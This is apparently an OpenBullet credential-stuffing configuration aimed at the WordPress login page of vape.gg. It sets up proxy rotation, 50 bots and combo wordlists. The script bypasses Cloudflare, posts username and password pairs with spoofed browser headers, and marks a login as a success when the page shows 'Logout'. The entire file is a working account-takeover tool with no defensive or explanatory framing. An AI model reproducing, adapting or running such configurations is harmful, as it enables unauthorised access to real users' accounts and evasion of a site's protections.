[SETTINGS]
{
  "Name": "Vape.GG",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2019-06-03T05:03:51.7026294+03:00",
  "AdditionalInfo": "",
  "Author": "Serpent",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
BYPASSCF "https://www.vape.gg/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 

REQUEST POST "https://www.vape.gg/wp-login.php" 
  CONTENT "log=<USER>&pwd=<PASS>&wp-submit=Log+In&redirect_to=https%3A%2F%2Fwww.vape.gg&testcookie=1" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "origin: https://www.vape.gg" 
  HEADER "referer: https://www.vape.gg/wp-login.php" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The username or password you entered is incorrect" 
  KEYCHAIN Success OR 
    KEY "Logout" 

